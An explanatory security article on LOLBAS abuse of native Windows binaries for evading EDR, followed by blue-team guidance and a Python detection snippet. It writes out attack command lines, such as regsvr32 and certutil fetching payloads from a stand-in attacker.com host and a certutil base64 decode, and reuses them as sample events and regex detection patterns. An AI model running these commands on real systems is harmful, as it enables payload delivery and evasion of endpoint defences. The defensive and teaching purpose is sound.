LOLBAS Exploitation: Bypassing EDR Systems Using Native Windows Binaries
Dive deep into advanced LOLBAS Exploitation techniques. Understand how attackers abuse trusted, native Windows binaries to bypass EDR and execute stealthy attacks.
The relentless cybersecurity arms race between attackers and defenders has driven dramatic, paradigm-shifting improvements in defensive technologies. Modern Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) solutions are incredibly sophisticated. They no longer rely solely on simplistic file hashes; instead, they employ artificial intelligence, complex behavioral analytics, memory scanning, and deep kernel-level hooks to identify and instantly terminate malicious processes.
As deploying custom, compiled malware executables (.exe files) to a target's disk became increasingly difficult and immediately triggered alarms, Advanced Persistent Threats (APTs) and elite Red Teams were forced to evolve their tactics. They realized that importing external malware was a losing game. So, they stopped bringing their own weapons to the fight and started using the powerful, inherently trusted weapons already lying around the battlefield.
This highly effective evasion methodology is formalized under the concept of LOLBAS: Living Off The Land Binaries and Scripts. LOLBAS focuses exclusively on exploiting the Microsoft Windows ecosystem. It is the advanced practice of utilizing legitimate, Microsoft-signed executable files that are native to the Windows OS to perform malicious actions. Because these binaries are digitally signed by Microsoft and are essential for normal system operations, they are inherently trusted by Windows and EDR systems. This trust provides the perfect camouflage for stealthy exploitation. In this advanced technical guide, we will dissect LOLBAS exploitation, examining exactly how these native binaries are abused to download payloads, execute fileless code, and bypass modern security controls.
The Core Concept and Threat of LOLBAS
The term LOLBAS was coined and popularized by the cybersecurity research community to categorize a specific, highly structured subset of the broader "Living off the Land" strategy. To be officially classified on the community-driven LOLBAS project repository, a binary or script must meet specific criteria:
- It must be a Microsoft-signed file. It is either natively installed with the Windows Operating System or can be downloaded directly from official Microsoft domains (like Sysinternals tools).
- It must have a legitimate, intended administrative or system purpose. (e.g., managing certificates, building software, compiling code).
- It must possess unexpected, undocumented, or highly abusable secondary functionality that can be leveraged by an attacker to further a compromise (such as downloading arbitrary files from the internet, executing arbitrary code, or bypassing User Account Control).
The threat posed by LOLBAS exploitation is profound and fundamentally challenges traditional defensive paradigms. EDR systems and Antivirus software rely heavily on reputation scoring and cryptographic signatures. A custom malware binary named hack.exe dropped in the C:\Temp directory immediately triggers alarms because it is unsigned, unknown, and has a terrible reputation score.
However, when the entirely legitimate Windows utility MSBuild.exe initiates an outbound network connection, or when rundll32.exe loads a library into memory, the EDR is far less likely to outright block it. Blocking these core Windows binaries could break legitimate Windows Update processes, software compilation, or fundamental OS operations, resulting in a system crash. Attackers ruthlessly exploit this necessity for operational continuity to execute their campaigns invisibly, hiding in the sheer volume of normal administrative noise.
Advanced LOLBAS Techniques and Exploitation Vectors
The LOLBAS project documents hundreds of Windows binaries, scripts, and libraries. Let's deeply examine some of the most critical, powerful, and frequently exploited LOLBAS vectors used by Red Teams and threat actors to bypass EDR.
1. MSBuild.exe: Achieving Fileless Code Execution
MSBuild.exe is the Microsoft Build Engine. It is a native, highly trusted command-line utility included with the .NET framework, designed for building and compiling software applications. It is an absolute favorite among attackers for achieving stealthy, fileless code execution.
The Exploit Mechanism: MSBuild.exe is designed to read and process XML-formatted project files (typically .csproj or .xml). Security researchers discovered that they can embed raw, uncompiled C# code or even malicious shellcode directly within these XML project files using a feature called "inline tasks."
When an attacker drops a seemingly benign XML file onto the target system and executes the command MSBuild.exe malicious.xml, the highly trusted Microsoft binary parses the XML, dynamically compiles the embedded C# code on the fly, and executes it entirely within the memory space of MSBuild.exe.
Why it Successfully Bypasses EDR: This technique is devastating because the malicious payload is never written to the hard drive as a compiled executable (.exe). It exists only as text within an XML file, completely bypassing static AV file scans. Furthermore, the process actually executing the malicious code is the highly trusted MSBuild.exe. Because MSBuild frequently runs and compiles code in standard developer environments, behavioral detection is incredibly difficult without generating massive amounts of false positives for legitimate developers.
2. Rundll32.exe: Payload Delivery and Execution
Rundll32.exe is a standard, ubiquitous Windows utility used to invoke and run code contained within Dynamic Link Libraries (.DLL files). It is constantly running on healthy Windows systems.
The Exploit Mechanism: Attackers abuse rundll32.exe in two distinct, powerful ways:
First, for stealthy payload delivery. Attackers can use specific command-line arguments to force rundll32 to connect to a remote server and execute code, entirely bypassing standard web browsers or PowerShell (which are heavily monitored).
Second, for executing malicious DLLs. If an attacker successfully drops a malicious DLL onto the file system, they cannot just double-click it. They must execute it seamlessly using the trusted host process: rundll32.exe C:\Temp\malicious.dll,EntryPoint.
Why it Successfully Bypasses EDR: EDRs expect rundll32.exe to constantly load and execute DLLs as part of normal, everyday OS operation. It is extremely noisy. Furthermore, advanced attackers can use sophisticated techniques like "DLL unhooking" or "AMSI patching" within their malicious DLL payload to blind the EDR's visibility into the rundll32.exe process space exactly as the payload executes.
3. Regsvr32.exe: Executing Remote Scriptlets (Squiblydoo)
Similar in function to rundll32, Regsvr32.exe is a native command-line utility used for registering and unregistering OLE controls, such as DLLs and ActiveX controls, in the Windows Registry.
The Exploit Mechanism: Regsvr32.exe contains a highly abusable, infamous feature widely known in the security community as "Squiblydoo." It can be forced to retrieve and execute a Component Object Model (COM) scriptlet (a .sct file) directly from a remote web server, without ever writing the script to disk.
The attack command looks like this: regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
Why it Successfully Bypasses EDR: This single command reaches out to the internet, downloads an XML-formatted scriptlet containing malicious VBScript or JScript, and executes it directly in memory via the trusted scrobj.dll component. Because the executable initiating the action is a trusted, native Windows binary, it frequently bypasses application whitelisting solutions like Windows AppLocker and Software Restriction Policies (SRP). The EDR sees a trusted Windows binary making a web request, which is harder to definitively classify as malicious compared to a random executable doing the same.
4. Certutil.exe: The Built-in Downloader and Decoder
As discussed in broader "Living off the Land" strategies, Certutil.exe is a command-line program intended for managing certificates and certificate services. However, its robust feature set makes it heavily abused as a stealthy file downloader and data decoder.
The Exploit Mechanism (Downloading): Attackers use it to download payloads without triggering alerts associated with Invoke-WebRequest in PowerShell. The command is simple: certutil.exe -urlcache -split -f http://attacker.com/malware.exe C:\Temp\malware.exe
The Exploit Mechanism (Decoding): More dangerously, attackers use certutil.exe to decode Base64 encoded files on the fly. To bypass perimeter email gateways and network firewalls that scan for executable file signatures (.exe), an attacker can drop a harmless-looking plain text file containing a base64 encoded executable. They then use the native command certutil -decode encoded.txt decoded.exe to reconstruct the malicious binary directly on the target system, post-delivery.
5. Bash.exe / Wsl.exe (Windows Subsystem for Linux)
With the introduction of the Windows Subsystem for Linux (WSL), Microsoft embedded a full, functional Linux kernel interface directly into the Windows operating system. This created an entirely new, massive attack surface.
The Exploit Mechanism: Attackers can invoke bash.exe or wsl.exe directly from a Windows command prompt to execute Linux commands that manipulate the underlying Windows file system. An attacker can use native Linux networking tools like wget or curl to download payloads, or use python3 to establish reverse shells.
Why it Successfully Bypasses EDR: WSL acts as a massive blind spot for many legacy EDR agents and network monitoring tools. Many Windows-centric security tools only inspect network traffic originating from known Windows APIs (like WinINet or WinHTTP). Because WSL utilizes a different networking stack, the traffic generated by wget inside WSL often bypasses host-based firewalls and EDR network telemetry entirely.
Defense and Detection Strategies for the Blue Team
Defending against LOLBAS exploitation requires a significant paradigm shift for Blue Teams. Since you cannot simply delete MSBuild.exe or block rundll32.exe without fundamentally breaking the operating system, defenders must rely on advanced behavioral analytics, strict execution controls, and deep process lineage tracking.
- Tuning EDR Behavioral Rules: Modern EDR must be tuned to rigorously analyze the command-line arguments and process lineage, not just the executable name. For example, rundll32.exe running is normal; however, rundll32.exe making an outbound HTTP connection to an unrecognized, external IP address to download a .sct file is highly anomalous and should result in immediate process termination.
- Windows Defender Application Control (WDAC): Implement strict application whitelisting using WDAC or AppLocker. Do not just whitelist by publisher (Microsoft). Create granular rules that actively block the execution of highly abused LOLBAS binaries (like MSBuild.exe, certutil.exe, or wmic.exe) for standard office users who have absolutely no legitimate business requirement to utilize them.
- Comprehensive Command-Line Logging: Enable comprehensive Process Creation logging (Event ID 4688) with full command-line auditing enabled via Group Policy. This is critical. It ensures that even if an attacker uses a native tool, the exact, specific parameters they passed to it (e.g., the URL passed to certutil) are recorded and forwarded to the SIEM for analysis and threat hunting.
- Leverage AMSI Integration: Ensure your security products deeply leverage the Microsoft Antimalware Scan Interface (AMSI). AMSI allows EDR and AV solutions to inspect the raw contents of scripts (like those executed via regsvr32, VBScript, or PowerShell) directly in memory, just before they are executed. This allows the EDR to identify malicious code patterns even if the code was delivered via a trusted LOLBAS vector and was obfuscated on disk.
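As an added illustration that is not part of the original article, the following Python snippet applies the command-line and process-lineage tuning described above to constructed 4688-style process-creation records. The event fields, the rule patterns (built from the certutil, regsvr32, rundll32, MSBuild and WSL cases this article walks through) and the sample command lines are assumptions, not telemetry from any real host or vendor product.

```python
import re

URL = r"(?:https?|ftp)://"

# Each rule: (description, regex on the process image, regex on the command line).
# The patterns mirror the abuse cases described in this article; tune them to your estate.
RULES = [
    ("certutil remote download",      r"certutil\.exe$",     rf"-urlcache\b.*{URL}"),
    ("certutil base64 decode",        r"certutil\.exe$",     r"-decode\b"),
    ("regsvr32 remote scriptlet",     r"regsvr32\.exe$",     rf"/i:{URL}.*\bscrobj\.dll"),
    ("rundll32 remote content",       r"rundll32\.exe$",     URL),
    ("MSBuild project in user path",  r"msbuild\.exe$",      r"\\(?:Temp|Downloads|AppData)\\.*\.(?:xml|csproj)\b"),
    ("WSL invoking Linux downloader", r"(?:wsl|bash)\.exe$", r"\b(?:wget|curl)\b"),
]
# A LOLBAS binary spawned by an Office application is a classic phishing chain.
OFFICE_PARENT = re.compile(r"\\(?:WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.I)

# Constructed sample records shaped like the fields a 4688 event with command-line auditing provides.
SAMPLE_EVENTS = [
    {"process": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},                       # benign
    {"process": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://attacker.com/malware.exe C:\Temp\malware.exe"},
    {"process": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll"},
    {"process": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"MSBuild.exe C:\Users\bob\AppData\Local\Temp\malicious.xml"},
    {"process": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},                    # benign developer build
]

def analyze_event(event):
    """Return (severity, matched rule descriptions) for one process-creation record."""
    hits = [desc for desc, image_re, cmd_re in RULES
            if re.search(image_re, event["process"], re.I)
            and re.search(cmd_re, event["cmdline"], re.I)]
    if not hits:
        return "none", []
    severity = "critical" if OFFICE_PARENT.search(event["parent"]) else "high"
    return severity, hits

def scan(events):
    """Return (index, severity, hits) for every record that fired at least one rule."""
    findings = []
    for i, event in enumerate(events):
        severity, hits = analyze_event(event)
        if hits:
            findings.append((i, severity, hits))
    return findings
```

Note that the two MSBuild records differ only in the project path and parent process, which is exactly the lineage and argument context the article says an EDR rule must weigh rather than the binary name alone.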
LOLBAS exploitation is a stark testament to the ingenuity and adaptability of cyber adversaries. By intimately understanding the vast, interconnected web of native Windows binaries and ruthlessly exploiting their undocumented or secondary features, attackers effectively transform the target operating system into its own worst enemy.
For Red Teams and penetration testers, mastering LOLBAS techniques is absolutely essential for simulating advanced, modern threats and successfully bypassing sophisticated EDR solutions during engagements. For Blue Teams and defenders, defending against LOLBAS is a complex, ongoing challenge that requires moving far beyond basic signature-based detection. It demands deep, granular visibility into process behaviors, strict and well-maintained application control policies, and the analytical capability to differentiate between a legitimate system administrator performing routine maintenance and an attacker silently pulling the strings using the exact same tools.